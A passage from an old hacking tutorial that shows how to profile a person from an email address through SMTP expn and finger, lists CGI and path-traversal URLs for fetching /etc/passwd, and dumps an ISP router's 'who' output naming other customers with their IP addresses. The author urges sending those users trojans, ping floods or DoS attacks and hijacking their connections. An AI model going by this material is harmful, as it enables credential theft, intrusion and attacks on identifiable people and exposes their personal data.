Now what does this 200 signify? Well the '200' is called the status code. Whenever you give the server a HTTP command, it processes the command and accrodingly displays a status code. A status code is a 3 digit code in the form of xxx. Status codes start from 1xx to 5xx. I am not sure what the 1xx series signifies as they are rarely used. The 2xx series signify a successful completion of the HTTP command given. The 3xx series signify errors due to moving of documents. The 4xx series signify errors caused at browser side and finally the 5xx series signify errors at the server side.

The most common status code that you come across, but what you may not have ever seen is the 200 OK status code. Each time you are able to see a page on the browser successfully, the browser has been sent this status code by the HTTP daemon.

The most common errors that you might come across and actually see would be the 404 Error---Not Found. This error message means that the Url that you are trying to access is not found, it has either been moved or has been deleted or the linking of the web pages itself has not been done properly. I can go to the up directory to look for the exact new changed URL.

***************

An email address is pretty much all you need to findout more about a person. Let's see how one can gather more information by just knowing the email address. Let's take my email address for example,

ankit@bol.net.in

Now normally the string after the '@' sign is the domain name of the ISP with which the user is registered. Hence the server of my ISP where you can find info on me would become bol.net.in. So you do a Port scan on bol.net.in but get the error message, Host Not Found.

Sometimes the string after the '@' sign is not the domain name.Yes the server exists, but is probably behind a firewall and normal users do not have access to it from an untrusted external Network. So you know examine the headers of an email sent by me. You see something like the following line in almost all emails sent by me and the delhi1.mtnl.net.in thing is always there.

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46

+0530 (IST)

So you do a Port Scan on delhi1.mtnl.net.in. You find that the following Ports are open:

21 FTP

25 SMTP

79 Finger

80 HTTP

110 POP

and more...

The FTP daemon does not give much info on the users. So let's forget it. So you move on to the SMTP port. Almost all version of Sendmail allow the 'vrfy' and the 'expn' commands. The 'vrfy' commands verfies if a particular email address is valid or not. The 'expn' command expands a particular email address. By that what I mean to say is that it provides additional information on the user owning the supplied email address.

For example,if we type the following while connected to Port 25, the server might respond with some interesting information on the user.

expn ankit@bol.net.in

For more details refer to the Sendmail Help.

The 'expn' and the 'vrfy' commands are not bugs in Sendmail but the features which were orignally meant to do what they do now. Most ISP's have configured the Sendmail daemon such that it does not provide any info if it encounters these commands.

Port 79 is by default the Finger Port. Unix users might know Finger as a command which gives more information about any user on the Internet whose email address is known. Unix users can finger a user by simply, typing:

finger email_address@domain_name.com

Windows users can use the DOS Telnet Client to telnet to Port 79.

C:\windows>telnet delhi1.mtnl.net.in 79

(My ISP has disabled the Finger Port so do not even try..)

No matter how you finger someone, you will either get an error message saying 'Access Denied' which means that the Finger Port is not open or you will be connected to the host with the Finger Daemon waiting for input. If you use a Windows Finger client (SamSpade I think so...) or Finger from Unix then the finger client automatically sends the user name which has to be fingered. But if you follow the Telnet method then when the Finger Daemon prompts for input, you will have to type the Username. For example,

ankit

The finger daemon would respond something like(I have inserted comments after \*

[delhi1.mtnl.net.in] \* My ISP

Login name: ankit In real life: Ankit Fadia \* My Login Name and my real

Name

Directory: /users/others/ankit Shell: /bin/ksh \* The Directory where my .plan and other files are stored and my shell type

Last login Fri Dec 8 17:04 on ttyp0 from 202.xx.109.38 \* My Last Login Info with last IP

No Plan. \* Error message as there is no .plan file in my User directory i.e. users/others/ankit

When you register with your ISP, you provide them with some info (The form that You fill up??). Now a part of this info is always shown whenever someone fingers you. The additional information like the Home Address and the residence Number, Office address, Office telephone Number etc. are shown or provided only if the .plan file exits. So what exactly is a .plan file?

Your home directory which is set by the system administrator contains some .plan files which are automatically created when you configure mail clients and other services. It also contains this .plan file which is not created automatically but the user has to create it himself. Sometimes your system administrator might create this file himself. Try to finger yourself and ensure that additional information about you is not displayed. If you find that fingering yourself gives out a lot of private information about you, then you should edit the .plan file or even delete it.

The finger daemon is rarely running on systems nowdays. Even if it is running, the system administrators configure it to not display any information at all.

The Finger daemon not only unwantingly display important info on the users but could also be used to get root.If you are real lucky and find an open Finger daemon then I suggest you try the following commands: finger root and finger system.

Say you do not even know the email address of a person. You only know the domain name he owns. Now you want to find out more about him, what do you do? WHOIS holds the key. It will return the email address of the owner of the domain name and then you can carry out the same normal process.

Hacking From your Web Browser

Nowdays, most websites use CGI scripts (or sometimes C scripts). Now these scripts are located in the /cgi-bin directory. What we want to do is, to download these scripts for further examination or even use these scripts to steal Passwords to access password protected parts of the website.

So simply put something like the below in the location bar of your browser to access the directory where the scripts are stored.

ftp://www.hostname.com/cgi-bin

ftp://www.hostname.com/../cgi-bin

http://www.hostname.com/cgi-bin

The ' ../ ' tells Unix systems to go up one directory.On some systems you should try '../../' instead.

The most common way to get the password file is to FTP anonymously and check if in the /etc directory access to the passwd (password file) is restricted or not. If it is not restricted then download the file and firstly unshadow it and then crack it.

Some systems have a file called PHF in the /cgi-bin directory which allow remote access to all files inlcuding the /etc/passwd file. The following are a list of URL's you can try to get the password file:

http://www.hostname.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

http://www.hostname.com/cgi-bin/php.cgi?/etc/passwd

http://www.hostname.com/~root

http://www.hostname.com/cgi-bin/test-cgi?* HTTP/1.0

http://www.hostname.com/cgi-bin/nph-test.cgi?* HTTP/1.0

http://www.hostname.com/samples/search/queryhit.html

http://www.hostname.com/samples/search/webhits.exe

http://www.hostname.com/_vti_pvt/service.pwd

http://www.hostname.com/secret/files/default.asp

ftp://www.hostname.com/etc/passwd

http://www.hostname.com/cgi-bin/htmlscript?../../../../etc/passwd

http://www.hostname.com/cgi-bin/view-source?../../../../../../../etc/passwd

What we want to do is to download the scripts and to examine them as to how they can be used to break the normal sequence. CGI Scripts can be used to Nuke the host and also to mail the password file to anyone we want.

Post Dial Up Screen Hacking

The Post Dial Up Screen is the black terminal screen that comes up whenever you connect to a router, which asks for a Username and Password. After authentication, it prompts the user to enter the type of connection i.e. PPP or SLIP. This process occurs whenever you dial into your ISP(Assuming that you have enabled the option).

When most of you connect to the Internet, do not have to go through this Post Dial Up Screen.This is because the 'Bring Up the Post Dial Up Screen' option is not enabled.To enable the Post Dial Up screen,simply follow the following steps:

1. Launch Dial Up Networking

2. Right Click on Your Connection name and select properties.

3. Under the General Tab click on the Configure Button.

4. Click on the Options Tab and select, bring up the Dial Up Screen After dialing option.

5. Click OK

So now the next time, when you dial into your ISP, instead of directly verifying the Username and Password and connecting you, the Dial Up Connection will bring up a Black Window titled 'The Post DialUp Screen. 'This screen symbolises the fact that we are now connected to the remote router of our ISP where the process of authentication takes place. It will ask for the Username and Password and once verified, we will get the prompt to specify the type of connection.The whole process would be something like:

User Access Verification

Username: ankit

Password:

delhinas4>

When this prompt (NOTE: Instead of delhinas4 your ISP may have something else written.) comes, we need to specify the type of connection, we want to establish: PPP or SLIP.

So typing PPP:

delhinas4>ppp

will result in my machine establishing a Point to Point Protocol(PPP)connection with my ISP.

But we are hackers and we surely do not want to learn how to establish a PPP connection.S o let's move on to interesting stuff. Like almost all systems on the Internet, this router prompt too gives us help.So let's see what happens when I ask for help.

delhinas4>help

Help may be requested at any point in a command by entering a question mark '?'. If nothing matches, the help list will be empty and you must backup until entering a '?' shows the available options.

Two styles of help are provided:

1. Full help is available when you are ready to enter a command argument (e.g. 'show ?') and describes each possible argument.

2. Partial help is provided when an abbreviated argument is entered and you want to know what arguments match the input

(e.g. 'show pr?'.)

So let me try typing simply, '?'.

delhinas4>?

Exec commands:

access-enable Create a temporary Access-List entry

access-profile Apply user-profile to interface

clear Reset functions

connect Open a terminal connection

disable Turn off privileged commands

disconnect Disconnect an existing network connection

enable Turn on privileged commands

exit Exit from the EXEC

help Description of the interactive help system

lock Lock the terminal

login Log in as a particular user

logout Exit from the EXEC

mrinfo Request neighbor and version information from a multicast

router

mstat Show statistics after multiple multicast traceroutes

mtrace Trace reverse multicast path from destination to source

name-connection Name an existing network connection

pad Open a X.29 PAD connection

ping Send echo messages

ppp Start IETF Point-to-Point Protocol (PPP)

resume Resume an active network connection

--More-- rlogin Open an rlogin

connection

show Show running system information

slip Start Serial-line IP (SLIP)

systat Display information about terminal lines

telnet Open a telnet connection

terminal Set terminal line parameters

traceroute Trace route to destination

tunnel Open a tunnel connection

where List active connections

x28 Become an X.28 PAD

x3 Set X.3 parameters on PAD

Wow!!! I got a whole list of allowed commands and also a single line description of each command. The router that we are connected to provides help on specific commands too. Anyway, let's try some kewl commands which reveal some very very useful info. I have inserted comments, wherever needed. The commands I type begin with the delhinas4> prompt.

delhinas4>

mrinfo

% Timed out receiving response

[Editor: Well the mrinfo command is supposed to get info from routers, but unfortunately it always times out when I try it on my ISP, so let's try giving the famous systat command.]

delhinas4>systat

Line User Host(s) Idle Location

3 tty 3 tkdutta Async interface 00:00:05

4 tty 4 mmanoj Async interface 00:01:13

6 tty 6 mpshukla Async interface 00:04:38

10 tty 10 chawlaep Async interface 00:00:01

14 tty 14 techshar Async interface 00:00:00

15 tty 15 dscl Async interface 00:00:34

17 tty 17 utility Async interface 00:00:28

19 tty 19 saraswti Async interface 00:00:07

25 tty 25 affvvdel Async interface 00:12:48

26 tty 26 sanjiv3 Async interface 00:00:00

27 tty 27 vvs Async interface 00:00:00

28 tty 28 herz1313 Async interface 00:00:00

31 tty 31 neccinfo Async interface 00:00:01

32 tty 32 gmmm Async interface 00:00:07

35 tty 35 cebw Async interface 00:00:00

37 tty 37 delhinet Async interface 00:00:00

40 tty 40 digdelhi Async interface 00:01:14

47 tty 47 giansu Async interface 00:00:06

50 tty 50 tafazal Async interface 00:00:01

51 tty 51 translnk Async interface 00:00:02

52 tty 52 procurez Async interface 00:05:14

53 tty 53 triden Async interface 00:00:05

--More-- Line User Host(s)

Idle Location

56 tty 56 prerna Async interface 00:00:00

58 tty 58 saroj Async interface 00:03:18

* 61 tty 61 ankit idle 00:00:01

68 tty 68 veekay Async interface 00:00:24

70 tty 70 kachi Async interface 00:00:01

74 tty 74 aqmohan Async interface 00:00:07

78 tty 78 mmdutta Async interface 00:00:00

81 tty 81 ks1assoc Async interface 00:00:00

87 tty 87 adinfo Async interface 00:00:35

88 tty 88 anni Async interface 00:00:00

89 tty 89 drrajive Async interface 00:00:04

107 tty 107 orienapp Async interface 00:00:34

109 tty 109 hmsdir Async interface 00:00:01

110 tty 110 anandpro Async interface 00:00:01

112 tty 112 guptalam Async interface 00:00:12

113 tty 113 airtalks Async interface 00:00:02

115 tty 115 yatish Async interface 00:00:27

117 tty 117 ttlnet4 Async interface 00:00:05

118 tty 118 dgmodlxr Async interface 00:00:00

120 tty 120 cdacd Async interface 00:00:00

The systat command gives us a list of currently logged on users. From the output, I now know their Usernames (and email addresses obviously) and the Time for which they have been online. But this info is not that useful, so let's try out the 'who' command. Note the '*' preceeding the Username with which I have logged into this router.

delhinas4>who

delhinas5>who

Line User Host(s) Idle Location

14 tty 14 jbagga Async interface 00:00:00 PPP: 203.xx.248.119

15 tty 15 ptat Async interface 00:03:33 PPP: 203.xx.248.151

16 tty 16 dlgrp Async interface 00:00:00 PPP: 203.xx.248.70

19 tty 19 viprirag Async interface 00:00:02 PPP: 203.xx.248.2

22 tty 22 uaedcnd Async interface 00:00:00 PPP: 203.xx.248.147

28 tty 28 entasis Async interface 00:00:34 PPP: 203.xx.248.140

29 tty 29 ehircrc Async interface 00:00:00 PPP: 203.xx.248.137

34 tty 34 najiaero Async interface 00:10:07 PPP: 203.xx.248.221

37 tty 37 amritp Async interface 00:00:40 PPP: 203.xx.248.50

39 tty 39 bagris Async interface 00:00:00 PPP: 203.xx.248.143

40 tty 40 manish11 Async interface 00:00:00 PPP: 203.xx.248.233

42 tty 42 sunilg Async interface 00:00:00 PPP: 203.xx.248.76

48 tty 48 dreamtec Async interface 00:00:20 PPP: 203.xx.248.5

50 tty 50 iii111 Async interface 00:00:01 PPP: 203.xx.248.187

53 tty 53 azure Async interface 00:00:00 PPP: 203.xx.248.186

55 tty 55 gsubbn Async interface 00:00:00 PPP: 203.xx.248.83

62 tty 62 tubetool Async interface 00:01:33 PPP: 203.xx.248.169

64 tty 64 neratele Async interface 00:01:10 PPP: 203.xx.248.124

65 tty 65 grecy Async interface 00:00:00 PPP: 203.xx.248.208

68 tty 68 ians Async interface 00:00:55 PPP: 203.xx.248.194

70 tty 70 prabal Async interface 00:00:06 PPP: 203.xx.248.1

71 tty 71 kwkicd Async interface 00:00:08 PPP: 203.xx.248.155

--More-- Line User Host(s)

Idle Location

73 tty 73 seco1 Async interface 00:00:01 PPP: 203.xx.248.230

74 tty 74 neelamm Async interface 00:00:00 PPP: 203.xx.248.32

75 tty 75 ukiran Async interface 00:00:07 PPP: 203.xx.248.53

76 tty 76 anandtsg Async interface 00:00:55 PPP: 203.xx.248.160

85 tty 85 avntin Async interface 00:06:14 PPP: 203.xx.248.126

87 tty 87 pnddelhi Async interface 00:00:00 PPP: 203.xx.248.144

88 tty 88 spph Async interface 00:00:02 PPP: 203.xx.248.108

* 89 tty 89 ankit idle 00:00:00

92 tty 92 krsawhny Async interface 00:00:14 PPP: 203.xx.248.192

94 tty 94 kashyaps Async interface 00:00:13 PPP: 203.xx.248.117

95 tty 95 slalklal Async interface 00:00:00 PPP: 203.xx.248.146

100 tty 100 computer Async interface 00:00:04 PPP: 203.xx.248.228

101 tty 101 kanchan1 Async interface 00:00:25 PPP: 203.xx.248.178

102 tty 102 kanhya Async interface 00:00:38 PPP: 203.xx.248.99

103 tty 103 dsidc Async interface 00:00:00 PPP: 203.xx.248.225

104 tty 104 nsl Async interface 00:00:00 PPP: 203.xx.248.152

106 tty 106 iconint Async interface 00:00:00 PPP: 203.xx.248.222

113 tty 113 atri Async interface 00:00:00 PPP: 203.xx.248.85

117 tty 117 striker Async interface 00:00:00 PPP: 203.xx.248.30

118 tty 118 coin Async interface 00:01:01 PPP: 203.xx.248.231

120 tty 120 snwadhwa Async interface 00:00:00 PPP: 203.xx.248.66

123 tty 123 prithvib Async interface 00:00:00 PPP: 203.xx.248.67

--More-- Line User Host(s)

Idle Location

124 tty 124 itssupp Async interface 00:00:02 PPP: 203.xx.248.93

125 tty 125 jukebox Async interface 00:03:45 PPP: 203.xx.248.44

129 tty 129 pwhelan Async interface 00:00:04 PPP: 203.xx.248.106

134 tty 134 kapil1 Async interface 00:00:02 PPP: 203.xx.248.215

142 tty 142 infoplex Async interface 00:00:03 PPP: 203.xx.248.159

143 tty 143 tanya74 Async interface 00:00:00 PPP: 203.xx.248.88

150 tty 150 kapuras Async interface 00:00:33 PPP: 203.xx.248.65

154 tty 154 mpliwal Async interface 00:00:46 PPP: 203.xx.248.94

155 tty 155 aatishi Async interface 00:00:00 PPP: 203.xx.248.179

156 tty 156 gcdmrc Async interface 00:00:00 PPP: 203.xx.248.205

164 tty 164 mland Async interface 00:00:00 PPP: 203.xx.248.61

168 tty 168 creation Async interface 00:03:10 PPP: 203.xx.248.55

169 tty 169 dgupta Async interface 00:00:02 PPP: 203.xx.248.29

173 tty 173 skylink Async interface 00:00:04 PPP: 203.xx.248.120

175 tty 175 rsystems Async interface 00:00:01 PPP: 203.xx.248.75

183 tty 183 hmpl Async interface 00:00:00 PPP: 203.xx.248.19

185 tty 185 dartinc Async interface 00:00:13 PPP: 203.xx.248.114

187 tty 187 rajive Async interface 00:00:02 PPP: 203.xx.248.204

189 tty 189 clinepi Async interface 00:00:46 PPP: 203.xx.248.72

191 tty 191 sammy Async interface 01:01:00 PPP: 203.xx.248.42

192 tty 192 atrish Async interface 00:01:47 PPP: 203.xx.248.176

202 tty 202 skylink Async interface 00:00:12 PPP: 203.xx.248.118

--More-- Line User Host(s)

Idle Location

207 tty 207 recom Async interface 00:00:01 PPP: 203.xx.248.35

211 tty 211 pusapoly Async interface 00:01:52 PPP: 203.xx.248.91

212 tty 212 rkglobal Async interface 00:00:57 PPP: 203.xx.248.36

219 tty 219 arajan Async interface 00:00:03

221 tty 221 sudhanju Async interface 00:00:00 PPP: 203.xx.248.102

225 tty 225 kkapahi Async interface 00:00:03 PPP: 203.xx.248.142

226 tty 226 lbsbra Async interface 00:00:00 PPP: 203.xx.248.183

227 tty 227 humra1k Async interface 00:00:01 PPP: 203.xx.248.64

239 tty 239 adcr Async interface 00:00:08 PPP: 203.xx.248.52

Vi2 exhibind Virtual PPP (Bundle) 00:00:27

Vi3 genpr Virtual PPP (Bundle) 00:09:14

Vi4 netcafe Virtual PPP (Bundle) 00:00:00

Vi6 bcddel Virtual PPP (Bundle) 00:00:00

Se6:4 cbidelzo Sync PPP 00:00:00

Se6:5 websityg Sync PPP 00:00:00

Se6:7 genpr Sync PPP -

Se6:11 bcddel Sync PPP -

Se6:12 exhibind Sync PPP -

Se6:14 samair Sync PPP 00:00:03

Se6:19 gosind Sync PPP 00:00:01

Se6:26 netcafe Sync PPP -

Interface User Mode Idle Peer Address

Now, what was that? Well not only did the 'who' command display the Usernames and the time online, but it also displayed the IP's of all people online. Now all you need to do is send a Trojan or something and start controlling the victim's computer. Or maybe try some DOS attacks or even start ping flooding the victim.

One may also send the disconnect string to the victim's modem to disconnect him or maybe even Hijack his connection. We will learn about this in a later issue.

Usually the systat and the who command 'who' command show display the same results, but on my ISP, they brought about different varied results. Another valuable command is the 'show' command which when used with the 'version' parameter displays the version of the OS running on the remote Router. In this case I find that my ISP has Cisco Routers running the Cisco OS. Now any hacker can easily look for a hole in this particular version of OS running on the Router and get root previledges.

delhinas4>show version

Cisco Internetwork Operating System Software

IOS (tm) 5300 Software (C5300-I-M), Version 11.3(9)T, RELEASE SOFTWARE

(fc1)

Copyright (c) 1986-1999 by cisco Systems, Inc.

Compiled Thu 08-Apr-99 10:54 by pwade

Image text-base: 0x60008920, data-base: 0x60550000

ROM: System Bootstrap, Version 11.2(9)XA, RELEASE SOFTWARE (fc2)

BOOTFLASH: 5300 Software (C5300-D-M), Version 11.3(9.2)T, MAINTENANCE

INTERIM SOFTWARE

delhinas4 uptime is 7 weeks, 1 day, 7 hours, 52 minutes

System restarted by power-on

System image file is "flash:c5300-i-mz_113-9_T.bin", booted via flash

cisco AS5300 (R4K) processor (revision A.32) with 32768K/16384K bytes of memory.

Processor board ID 11494401

R4700 processor, Implementation 33, Revision 1.0 (512KB Level 2 Cache)

Channelized E1, Version 1.0.

Bridging software.

X.25 software, Version 3.0.0.

Primary Rate ISDN software, Version 1.1.

Backplane revision 2

Manufacture Cookie Info:

EEPROM Type 0x0001, EEPROM Version 0x01, Board ID 0x30,

--More-- Board Hardware Version 1.64, Item Number

800-2544-2,

Board Revision B0, Serial Number 11494401,

PLD/ISP Version 0.0, Manufacture Date 8-Dec-1998.

1 Ethernet/IEEE 802.3 interface(s)

1 FastEthernet/IEEE 802.3 interface(s)

31 Serial network interface(s)

120 terminal line(s)

4 Channelized E1/PRI port(s)

128K bytes of non-volatile configuration memory.

8192K bytes of processor board System flash (Read/Write)

4096K bytes of processor board Boot flash (Read/Write)

Configuration register is 0x2102

The show command has some very useful paramters which can be used to get a lot of info. To get an entire list of parameters and a single line description, type:

delhinas4>show ?

WORD Flash device information - format <dev:>[partition]

bootflash Boot Flash information

calendar Display the hardware calendar

clock Display the system clock

context Show context information

dialer Dialer parameters and statistics

history Display the session command history

hosts IP domain-name, lookup style, nameservers, and host table

isdn ISDN information

location Display the system location

modem Modem Management or CSM information

modemcap Show Modem Capabilities database

ppp PPP parameters and statistics

rmon rmon statistics

sessions Information about Telnet connections

snmp snmp statistics

tacacs Shows tacacs+ server statistics

tdm TDM connection information

terminal Display terminal configuration parameters

traffic-shape traffic rate shaping configuration

users Display information about terminal lines

version System hardware and software status

--More--

The following are the results that I get when I try out the kewl parameters of the show command.

delhinas4>show calendar

16:19:06 UTC Sun Apr 16 2000

delhinas4>show hosts

Default domain is bol.net.in

Name/address lookup uses domain service

Name servers are 203.xx.243.70, 203.xx.227.70

Host Flags Age Type Address(es)

delhinas4>show modem

Avg Hold Inc calls Out calls Busied Failed No

Succ

Mdm Time Succ Fail Succ Fail Out Dial Answer

Pct.

1/0 00:10:43 1375 375 0 0 0 0 125

78%

1/1 00:10:52 1392 370 0 0 0 2 126

79%

* 1/2 00:11:36 1388 329 0 0 0 0 100

80%

* 1/3 00:12:19 1347 328 0 0 0 0 114

80%

1/4 00:12:34 1326 334 0 0 0 2 101

79%

* 1/5 00:11:30 1375 341 0 0 0 1 85

80%

1/6 00:12:26 1358 326 0 0 0 3 94

80%

* 1/7 00:11:20 1402 322 0 0 0 1 96

81%

* 1/8 00:11:26 1388 335 0 0 0 1 107

80%

1/9 00:13:05 1328 313 0 0 0 3 111

80%

1/10 00:10:59 1402 336 0 0 0 0 107

80%

1/11 00:12:31 1349 323 0 0 0 1 115

80%

1/12 00:13:12 1303 309 0 0 0 6 96

80%

* 1/13 00:12:11 1339 337 0 0 0 2 103

79%

* 1/14 00:11:08 1398 337 0 0 0 2 103

80%

1/15 00:12:28 1328 342 0 0 0 3 96

79%

* 1/16 00:11:18 1416 320 0 0 0 2 96

81%

1/17 00:11:41 1118 275 0 0 0 1 84

80%

* 1/18 00:12:03 1324 352 0 0 0 2 106

78%

1/19 00:11:29 1369 371 0 0 0 1 120

78%

1/20 00:11:25 1323 372 0 0 0 2 109

78%

--More-- 1/21 00:10:40 1431 340 0

0 0 2 111 80%

1/22 00:12:12 1343 329 0 0 0 3 101

80%

1/23 00:11:40 1363 330 0 0 0 0 102

80%

* 1/24 00:12:22 1340 317 0 0 0 0 113

80%

* 1/25 00:11:36 1383 348 0 0 0 3 128

79%

* 1/26 00:14:09 1297 294 0 0 0 1 99

81%

* 1/27 00:10:25 1436 359 0 0 0 1 103

80%

1/28 00:11:08 1411 331 0 0 0 1 95

80%

1/29 00:10:25 1438 343 0 0 0 0 99

80%

* 1/30 00:10:35 1443 352 0 0 0 2 104

80%

* 1/31 00:11:06 1434 325 0 0 0 0 108

81%

1/32 00:11:30 1379 358 0 0 0 0 122

79%

1/33 00:11:04 1406 345 0 0 0 2 107

80%

* 1/34 00:12:38 1321 338 0 0 0 0 105

79%

1/35 00:12:14 1346 326 0 0 0 2 104

80%

* 1/36 00:11:13 1400 333 0 0 0 0 101

80%

1/37 00:11:52 1338 363 0 0 0 1 99

78%

1/38 00:13:19 1262 322 0 0 0 0 113

79%

* 1/39 00:11:39 1366 341 0 0 0 2 93

80%

1/40 00:10:34 1380 396 0 0 0 0 122

77%

1/41 00:10:36 1417 356 0 0 0 0 115

79%

1/42 00:11:16 1404 306 0 0 1 3 95

82%

1/43 00:11:43 1418 326 0 0 1 1 106

81%

--More-- 1/44 00:11:25 1347 367 0

0 1 2 105 78%

1/45 00:11:22 1371 362 0 0 1 0 111

79%

* 1/46 00:12:08 1326 340 0 0 1 1 92

79%

1/47 00:11:47 1365 358 0 0 1 1 111

79%

* 1/48 00:11:35 1359 341 0 0 0 2 98

79%

1/49 00:11:12 1376 359 0 0 0 2 99

79%

* 1/50 00:12:10 1370 345 0 0 0 4 109

79%

* 1/51 00:12:00 1375 319 0 0 0 2 117

81%

* 1/52 00:11:41 1390 322 0 0 0 0 98

81%

1/53 00:12:49 1330 330 0 0 0 0 98

80%

1/54 00:11:35 1396 327 0 0 0 2 92

81%

* 1/55 00:12:43 1354 301 0 0 0 1 83

81%

1/56 00:11:31 1379 341 0 0 0 1 109

80%

1/57 00:12:00 1369 324 0 0 0 2 96

80%

1/58 00:12:03 1342 361 0 0 0 0 103

78%

1/59 00:12:17 1305 349 0 0 0 1 101

78%

* 2/0 00:12:11 1337 362 0 0 0 0 107

78%

2/1 00:14:01 1251 322 0 0 0 2 98

79%

2/2 00:12:34 1328 322 0 0 0 0 109

80%

2/3 00:12:24 1358 318 0 0 0 0 105

81%

2/4 00:12:24 1356 309 0 0 0 0 97

81%

2/5 00:10:14 1451 344 0 0 0 1 103

80%

2/6 00:12:18 1333 340 0 0 0 0 105

79%

--More-- * 2/7 00:12:35 1333 335 0

0 0 0 108 79%

2/8 00:11:17 1427 346 0 0 0 1 129

80%

* 2/9 00:12:07 1361 299 0 0 0 0 95

81%

2/10 00:10:47 1407 370 0 0 0 0 98

79%

2/11 00:11:07 1409 333 0 0 0 2 102

80%

2/12 00:10:51 1444 323 0 0 0 2 110

81%

* 2/13 00:10:11 1393 406 0 0 0 3 115

77%

2/14 00:12:31 1228 315 0 0 0 2 110

79%

2/15 00:10:41 1405 361 0 0 0 0 113

79%

2/16 00:12:44 1357 295 0 0 0 0 87

82%

* 2/17 00:11:15 1362 355 0 0 0 1 102

79%

2/18 00:11:30 1363 343 0 0 0 1 105

79%

2/19 00:11:49 1349 350 0 0 0 1 110

79%

* 2/20 00:11:40 1341 347 0 0 0 3 102

79%

2/21 00:11:40 1374 341 0 0 0 2 98

80%

2/22 00:11:41 1378 329 0 0 0 0 101

80%

2/23 00:12:35 1335 322 0 0 0 0 100

80%

2/24 00:12:33 1353 309 0 0 0 1 91

81%

2/25 00:11:36 1371 330 0 0 0 3 106

80%

* 2/26 00:11:18 1403 332 0 0 0 1 107

80%

* 2/27 00:11:56 1349 350 0 0 0 0 115

79%

* 2/28 00:10:41 1421 340 0 0 0 0 110

80%

2/29 00:11:49 1352 326 0 0 0 0 116

80%

--More-- * 2/30 00:10:21 1446 353 0

0 0 1 120 80%

2/31 00:11:33 853 219 0 0 0 0 69

79%

2/32 00:12:09 1361 339 0 0 0 0 101

80%

2/33 00:11:20 1388 346 0 0 0 1 113

80%

2/34 00:12:27 1340 312 0 0 0 0 106

81%

2/35 00:12:02 1348 340 0 0 0 3 101

79%

2/36 00:11:18 1368 349 0 0 0 4 111

79%

2/37 00:12:21 1346 320 0 0 0 2 116

80%

2/38 00:11:59 1377 330 0 0 0 1 108

80%

2/39 00:11:53 1406 303 0 0 0 0 98

82%

* 2/40 00:12:39 1340 335 0 0 0 1 97

80%

2/41 00:11:20 1386 352 0 0 0 0 113

79%

* 2/42 00:11:06 1384 351 0 0 0 2 111

79%

* 2/43 00:12:15 1359 331 0 0 0 0 107

80%

2/44 00:12:04 1365 331 0 0 0 1 95

80%

2/45 00:11:04 1411 316 0 0 0 1 93

81%

* 2/46 00:12:02 1338 349 0 0 0 2 97

79%

2/47 00:11:30 1396 345 0 0 0 0 91

80%

* 2/48 00:11:04 1406 338 0 0 0 3 108

80%

* 2/49 00:11:42 1368 349 0 0 0 0 114

79%

2/50 00:12:09 1329 339 0 0 0 2 112

79%

* 2/51 00:11:56 1341 335 0 0 0 1 107

80%

* 2/52 00:10:42 1376 372 0 0 0 4 110

78%

--More-- 2/53 00:12:28 1309 345 0

0 0 1 122 79%

* 2/54 00:13:29 1315 295 0 0 0 1 90

81%

2/55 00:11:22 1379 363 0 0 0 2 114

79%

* 2/56 00:13:40 1264 335 0 0 0 2 90

79%

2/57 00:11:03 1367 367 0 0 0 1 128

78%

2/58 00:10:58 1382 360 0 0 0 1 103

79%

* 2/59 00:12:11 1372 313 0 0 0 3 88

81%

Total: 00:11:45 163207 40377 0 0 6 146 12548

80%

delhinas4>show clock

*16:19:42.948 UTC Sun Apr 16 2000

delhinas4>show terminal

Line 61, Location: "", Type: ""

Length: 24 lines, Width: 80 columns

Status: Ready, Active, No Exit Banner, Modem Detected

Capabilities: Hardware Flowcontrol In, Hardware Flowcontrol Out

Modem Callout, Modem RI is CD, Line usable as async interface

Output non-idle, Modem Autoconfigure, Integrated Modem

Modem state: Ready

modem(slot/port)=2/0, state=CONNECTED

dsx1(slot/unit/channel)=0/1/20,

status=VDEV_STATUS_ACTIVE_CALL.VDEV_STATUS_ALLOCATED.

Modem hardware state: CTS DSR DTR RTS, Modem Configured

Special Chars: Escape Hold Stop Start Disconnect Activation

^^x none - - none

Timeouts: Idle EXEC Idle Session Modem Answer Session Dispatch

00:10:00 00:20:00 none not

set

Session idle time reset by output.

Idle Session Disconnect Warning

00:01:00

Login-sequence User Response

00:00:30

Autoselect Initial Wait

not set

Modem type is new_modemcap3.

Session limit is not set.

--More--

delhinas4>show dialer

Serial0:0 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:1 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:2 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:3 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:4 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

--More-- Wait for carrier (30 secs), Re-enable (15

secs)

Dialer state is idle

Serial0:5 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:6 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:7 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:8 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

--More-- Serial0:9 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:10 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:11 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:12 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:13 - dialer type = ISDN

